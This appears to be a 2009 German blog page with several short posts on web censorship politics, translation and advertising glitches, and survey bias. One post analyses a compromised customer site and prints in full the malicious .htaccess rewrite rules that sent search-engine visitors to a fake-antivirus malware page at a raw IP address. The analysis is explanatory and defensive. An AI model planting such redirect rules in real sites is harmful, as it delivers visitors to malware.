Bewährte Methoden?

Ursula von der Leyen sollte ihre Vorgehensweise gegen Kinderpornographie im Web mal anderen Ministerien näher erläutern, so bekommen wir bestimmt noch viele andere Probleme schnell und billig „gelöst“:

Zensursula stoppt Obdachlosigkeit

Quelle

Veröffentlicht unter Politik, Web | Verschlagwortet mit , | Hinterlasse einen Kommentar

Fehlgeleitet: Webseiten-Schädlingsbefall

Bei einer Analyse einer Kunden-Domain fiel die .htaccess-Datei ins Auge:


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

Sie stammt nicht vom Kunden, sondern ein Cracker hatte sich die FTP-Zugangsdaten per trojanischem Pferd vom Windows-Rechner des Kunden erschlichen. Mit diesen Zugangsdaten wurde dann obige .htaccess-Datei auf den Kunden-Webspace hochgeladen, außerdem auch einige Casino-/Porno-Links in einen <noframes>-Bereich der Webseite untergebracht.

Das perfide ist aber die .htaccess-Datei. Sie weist das Apache-Modul mod_rewrite an bei eingehenden Anforderungen an den Webserver zu prüfen, von wo der Surfer kommt (HTTP_REFERER). Hat der Surfer einen harmlosen Treffer auf einer Suchmaschinenseite angeklickt, die zu eben jener Kundenpräsenz führt, dann greifen obige Regeln: Kommt man von *oogle.*, *aol.* etc., dann greift die letzte Zeile mit der Regel (RewriteRule): Umleiten des Surfers auf die angegebene Adresse 87.248.180.89. Somit bekommt man bspw. von Google aus einen Treffer zu Brotbackautomaten, den man anklickt, landet aber nach dem Klick nicht auf der Brotbackautomaten-Seite, sondern auf der Seite des Schädlingsautors.

Dort war bisher eine Website zu finden, die in der Aufmachung an einen Virenscanner unter Windows XP erinnerte. Elemente waren so gezeichnet, dass sie wie Windows-Fenster aussahen. Dazu wurden Icons von Festplattenlaufwerken C: und D: eingeblendet und ein Fortschrittsbalken, der einen Überprüfungsvorgang der vermeintlichen Antiviren-Software aussah.

Und natürlich fand diese angebliche Überprüfung der angeblich eigenen Festplatte dann auch gleich Treffer: eine Warnmeldung schlug vor, gegen den gerade gefundenen Virus doch gleich das Gegenmittel herunterzuladen und zu starten.

Wenn man das dann getan hätte, hätte sich der Kreis geschlossen: ein weiterer PC wäre mit einem Schädling befallen gewesen, der dann im Hintergrund und unauffällig alles mit Windows hätte tun können: Tastatureingaben mitlesen und nach draußen übermitteln, als Spam-Drohne dienen (im Auftrag von anderen hätte der eigene PC dann unbemerkt Spam-Mails versandt) und/oder Teil eines Bot-Netzes zu werden.

Der Provider der Schädlingsseite hat nun den Webspace gelöscht oder abgedreht, die Seite ist nicht mehr erreichbar.

Veröffentlicht unter Internet, Sicherheit, Web | Verschlagwortet mit , , , , | Hinterlasse einen Kommentar

Babel fish ist nicht Babelfisch

Babelfish nutzte ich schon gerne zu Altavistas Zeiten, der neue Eigner Yahoo scheint dem Tierchen jedoch nicht seine gewohnte Nahrung zu geben: externe Gehirnwellen. Nur so ist zu erklären, dass wirr erscheint seine Ausgabe:

Yahoo: Babelfish-Blurp

(Und, unter uns: meine Anfrage war nicht fehlerhaft.)

Veröffentlicht unter Web | Verschlagwortet mit | Hinterlasse einen Kommentar

Ins Leere geworben

Ich dachte immer, Werbung solle (ggfs. langfristig) Kunden dazu bringen, die beworbenen Produkte zu kaufen.

Offenbar eine altmodische Sichtweise. Heute wirbt man und will dann gar nicht verkaufen! Das muss eine moderne Maßnahme zur Steigerung der Marken^WBrand-Awareness sein, von der ich keine Ahnung habe.

Bei der Suche nach Intels neuem D945GSEJT-Mainboard stieß ich auf die Werbeanzeige:

Das war ja genau, was ich suchte! Und da sonst wenig verwertbare Treffer bei Google zu finden waren, klickte ich darauf, um zu erfahren …

Amazon-Treffer für Intel D945GSEJT

Aber Außer Spesen nichts gewesen scheint en vogue zu sein.

Veröffentlicht unter Web | Verschlagwortet mit , | Hinterlasse einen Kommentar

Web-Zensur: Suggestivfragen stützten von-der-Leyen-Vorschlag

Die gerade durch die Presse gerauschten 92% der Bundesbürger, die sich für den von-der-Leyen-Vorschlag für Internet-Zensur (die dort so natürlich nicht genannt wurde) ausgesprochen haben, kamen nicht unwesentlich durch Suggestiv-Fragen der in Auftrag gebenden „Deutschen Kinderhilfe“ zustande.

Der Verein „Mogis – Missbrauchsopfer gegen Internetsperren“ gab beim selben Umfrageinstitut (Infratest Dimap) eine Umfrage zum selben Thema, aber mit anders formulierten Fragen in Auftrag.

Schon wurden aus der Zustimmung von 92% für die Fragestellung „Die Bundesregierung plant ein Gesetz zur Sperrung von kinderpornographischen Seiten im Internet. Kritiker befürchten eine Zensur und bezweifeln die Wirksamkeit solcher Sperren. Befürworter betonen dagegen, dass solche Sperren eine sinnvolle und wirksame Maßnahme gegen die Verbreitung solcher Bilder sind. Wie sehen Sie das: Sind Sie für ein Gesetz zur Sperrung kinderpornographischer Seiten im Internet oder dagegen?“ nur noch 5% (Zustimmung zur Aussage „Der Zugang zu Internetseiten mit Kinderpornographie sollte durch eine Sperre erschwert werden, das reicht aus, auch wenn die Seiten selbst dann noch vorhanden und für jedermann erreichbar sind.“)

Waren in der ersten Umfrage über 90% für Netzsperren, ist es in der zweiten Umfrage genau umgekehrt.

Ein Sachbeitrag zur Debatte war die Umfrage der Deutschen Kinderhilfe somit nicht.

Quelle: ZEIT-Artikel vom 20.5.2009, 13:09 Uhr

Wer die Suggestion im Titel findet, darf sie behalten.

Veröffentlicht unter Politik, Web | Verschlagwortet mit , , | Hinterlasse einen Kommentar